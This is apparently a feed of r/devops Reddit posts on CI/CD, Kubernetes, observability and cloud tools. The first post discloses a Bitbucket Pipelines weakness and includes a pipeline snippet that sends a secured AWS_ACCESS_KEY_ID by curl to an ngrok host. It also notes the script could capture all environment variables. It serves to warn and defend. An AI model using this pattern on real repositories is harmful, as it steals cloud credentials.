(Free) Bitbucket pipelines can leak your credential

Lately I has been working with a Free version of Bitbucket Pipeline to apply for my side project. The more I work with it, the more I see the pipeline as a security risk, expecially in the repository with contractor type dev.

So today I do some testing to confirm my hypnosis.

The project setup:
I have a repo with dev and main branch, these branches can only be merge/write with admin account.
We have some credential in `Repositories Variables` and some in `Deployment Variables`, one of them is AWS_ACCESS_KEY_ID and we already mark it as secured in the setting

As bitbucket-pipelines.yml file can be change in feature branch, developer can add new pipelines rule to trigger pipeline for that specific branch only:
ex:
```
definitions:
steps:
- step: &build-deploy

pipelines:
branches:
dev:
- step:
<<: *build-deploy
deployment: staging
master:
- step:
<<: *build-deploy
deployment: production

# start malice changes
test-hack-pipeline:
- step:
script:
- >-
curl --header "Content-Type: application/json"
--request POST
--data "{\"username\":\"${AWS_ACCESS_KEY_ID}\"}"
https://9d756c9f91e2.ngrok.io
# end malice changes
```

With just a little bit of change, I can extract a "Repositories Variables". There no thing to prevent I extends that script to capture all the other enviroment variables.

In case of `Deployment Variables`, those value can be proteced by the premium feature call `Deployment permissions`, where we can restrict the deployment variables access from unproteted branch.

So if you don't trust your dev, definately upgrade to premium and move all credential into `Deployment Variables`

https://redd.it/lt5eic
@r_devops

For dev's looking for grants to develop apps around crypto

just wanted to drop this here if anyone is interested. The Kin Foundation is offering grants to developers that want to join the Kin ecosystem through the catalyst fund. why work for free when Kin will pay you and support you?

https://kin.org/catalyst-fund/

https://www.reddit.com/r/KinFoundation/

https://redd.it/lt9msx
@r_devops

Deep linking Question (in videos)

Hey, all! First time poster here. Please let me know if this is on the wrong board.

Do you guys happen to know of any meta documentation tools/platforms/plugins/etc.?

i.e. if someone were to search “marital issues” inside of our site/platform, our platform would allow us the ability to deep link into specific video timestamps where our video subjects would mention “marital issues” without playing the high-level video from the beginning.
Thanks in advance! 🙂

https://redd.it/ltatys
@r_devops

Assistance hashing out testing in CI/CD pipeline

I built this graphic primarily to help myself wrap my brain around how to implement testing in the CI/CD pipelines I'm building. Seeking assistance and input on it to see where I'm wrong, what is missing, what is / isn't necessary, etc.

https://imgur.com/a/6eMnVcd

https://imgur.com/a/PiQ9Kp0

My primary questions are the following:

1. The biggest one: Does this look right? Am I missing steps? Are any of them not necessary?
2. I really haven't quite wrapped my brain around how to do the integration testing. Really, just / and /api, and /admin and /api, need integration testing, but not 100% sure how to go about this: docker-compose, another k8s cluster in a VM like the unit tests, etc?
3. Any other suggestions?

I'm trying to implement good practices. Our's are currently... not great. We do have pipelines setup, but all of the testing is manual: test in dev, PR and deploy to staging, manual test in staging, PR and merge to production, manual testing of production.

My end goal is to have the PR trigger a pipeline to run tests and merge if they all pass, which triggers the deployment to production.

As always, I appreciate the help!

https://redd.it/lsytih
@r_devops

Alternate to AWS Fargate in Microsoft Azure

What is the alternative to AWS Fargate in Azure

https://redd.it/lt3nf2
@r_devops

Docker like dedicated to Embedded System

Hi there! :)

I've just launched the new release of an open source and real-time embedded software named Luos.

Luos is like Docker, but dedicated to embedded systems. In other, words Luos is an open source and real-time architecture for designing, testing, and deploying embedded applications.

It could be great if you try it, and give me some feedback (I really need feedback) ➔ https://docs.luos.io

Of course I'm here if you need help :D

https://redd.it/lt1h9x
@r_devops

Observability with infrastructure as code

I recently guest wrote a post on pulumi's website about using their Automation API to give myself much deeper insights into cloud resource creation.

I am currently using this with tooling where users can request foundational infrastructure through a webui, where it will create all the needed bits (e.g. vpc, peerings, flow logs, authentication, and a optionally a basic environment of RDS, ECS etc.) and as part of this process, it takes generated credentials and stores them in a Vault instance. The issue I had was when something failed to create, I had a hard time seeing what and why, and if something was taking longer than usual (such as a security group deletion hanging around indefinitely).

The tech used is pulumi and honeycomb, but other providers could be used but might be more effort (e.g. parsing terraform output to generate the spans).

https://www.pulumi.com/blog/observability-with-infrastructure-as-code/

https://redd.it/lswm6f
@r_devops

Dynatrace as a DevOps Tool

Does anyone use Dynatrace for DevOps. We are traditional devops and support the software but we are also doing internal devops. I like the tool and it does say it works well with ADO but I am only seeing developmental uses not necessarily devops uses. Any advice would be appreciated! (2 years in devops)

https://redd.it/lt0814
@r_devops

Manual actions that you wish were automated

First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members that are strongly focused on DevOps culture. I've spent quite some time recently researching why & how companies implement DevOps methodologies. While there's so much more for me to learn, the main concept I keep coming back to is automation. Specifically how important it is to bridging the gap between development & operations, and how it significantly improves delivery of features & functionality to customers.

I'm going to continue to engage with my team members on some the questions below, but I'm curious to hear from a larger audience:

* What are some actions you take that you wish were automated?
* Are those actions related to the general delivery pipeline, troubleshooting, or generating regular feedback?
* What's prohibited you or your team from automating those actions to reduce time & efforts?

https://redd.it/lt010g
@r_devops

SigNoz - an open source alternative to DataDog

Hi everyone! Together with my brother I've been working on SigNoz for the past few months. It's built on ReactTS and Go, and based on Kafka & druid underneath.

Here’s our github repo: https://github.com/SigNoz/signoz

As of now, we have focused on providing a seamless experience between metrics and traces, and plan to add logs in the coming months as opentelemetry logs matures (currently in alpha). SigNoz supports custom aggregates on filtered traces - and much sophisticated filtering as we use druid underneath

We recently released an initial version. Would love any thoughts on if this would something which would be useful for you or how we can make it better for folks here?

https://redd.it/lsza5s
@r_devops

[Upcoming webinar] Using observability to scale AWS Lambda

In this 45-minute webinar we'll be discussing how to **utilize observability to optimize your Lambdas for scale and maintain their performance over time** \- from development to production to scabability.

What you'll learn:

* How do you spot potentially **slow-running Lambda functions** and how do to **power-tune** **them in development**?
* **Load testing** and how you need a **good observability** tool for when you do load testing? How to do load testing?
* How to use observability and **make crucial data available in production** and at scale?
* **Observability best practices** and common mistakes.
* SRE maintenance and **keeping your infrastructure performance healthy** in the long-term.

Presenters: **Ben Ellerby** (AWS serverless hero and VP of engineering at Theodo), **Alexander White**, Full-Stack Mobile and Web Engineer at Theodo and **Taavi Rehemägi**, CEO and Co-Founder at Dashbird.

RSVP here: [https://sls.dashbird.io/lambda-observability-webinar](https://sls.dashbird.io/lambda-observability-webinar)

https://redd.it/ltjumi
@r_devops

Build k8 cluster from scratch, IaC and CI/CD choice?

Hi!

I'm involved in a startup and we are going to build a new k8 cluster with Openshift Container platform on IBM cloud (dont ask why :D). The cluster will host databases, websites, mobile apps, middlelayers apps, developed with javascript, java and python. In the future we will implement kafka/event streams as well. My questions to you here:


1. What IaC tools would you use in order to manage the cluster? Been looking into terraform to manage infrastructure
2. What CI/CD tools would you use in order to connect github with kubernetes cluster?
3. What monitoring and issue trackers do you have good experiences with?
4. What IaC tools, CI/CD tools and other "DevOps" tools to you have bad experience with? Just so I know what to watch out for. Could be cost related, bugs, features, functionality etc.

All opinions are welcome. Thank you.

Best regards,
oscillate123

https://redd.it/lsyaj7
@r_devops

Chicken or the egg?

Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering an aws infrastructure thats along the lines of:

* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic

Its my understanding, that in terms of setting this up:


terraform will create all the instances (the masters, workers, jenkins instance, etc). ansible will install / configure kubernetes, jenkins, elastic. jenkins will then take charge of deploying all the services to kubernetes.

Am i far off in my high level overview? Is the order of how things would happen incorrect?

https://redd.it/lsopxk
@r_devops

How do you manage the secrets that your code needs from Hashicorp Vault?

I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them. Suppose you need folder1/subfolder1/secret1/key1 and folder2/subfolder2/secret2/key2.

How do you keep these dependencies in your code? Do you have something like a
my_dependencies.yml which is read by your code and it queries based on that --

- requiredvaultsecrets:
folder1:
subfolder1:
secret1:
- key1
folder2:
subfolder2:
secret2:
- key2

https://redd.it/lsmomy
@r_devops

Terraform for Beginners

I Need to learn terraform for AWS, any recommendations??

https://redd.it/lsktkb
@r_devops

It takes me a lot longer to configure resources with code than it does in the gui

What is the problem, besides the fact that I am terrible at programming? I can't write more than four letters without looking up syntax. I can't abstract away code examples to fit my needs. I just stare at them wondering how what I am looking at could possibly have anything to do with what I need done. I hate this.

https://redd.it/ltssqb
@r_devops

How are the build and deploy processes carried out in your company?

Do you have a team of DevOps or dedicated people in charge of these processes?

And if not, then how do all these processes work for you?

https://redd.it/ltwqyl
@r_devops

Which is better for kubernetes AWS vs Azure for kubernetes?

Which is better for kubernetes AWS vs Azure for kubernetes?

https://redd.it/ltqfnl
@r_devops

Which programming language did you learn, and have you found a way to learn it by building apps?

Hello everyone! I'm in the process of trying to follow the devops roadmap, and I see several programming languages on there to get started with. Which one did you choose, and have you found a way to learn by building (rather than lectures)?

https://redd.it/ltpv6x
@r_devops

How do you decide which cloud platform to use for your next project?

I was just wondering what criteria people used to evaluate Azure, Google Cloud Platform and AWS (and any of the others I probably haven't heard of)?

Each of them has a different feature set, and of course, a completely different way of doing things, so once you have decided on one, you are pretty much stuck on that cloud as migration would be a massive task.

So how do you choose?

https://redd.it/ltmtuf
@r_devops

Does it bother anyone if a site can't work without Javascript?

I'm building an application for our external customers that let's the interact with their orders, personal information, and contracts. My intention was to build a typical SPA, with Vue.js on the front. One of my coworkers mentioned that we shouldn't use a SPA because some of our customer might be using NoScript.

Is it common to build for no-JS interactivity? It just feels like it would be a lot of duplicated work to build something that would work without JS, and then to build something that works nicer for everyone else.

https://redd.it/lu19ce
@r_devops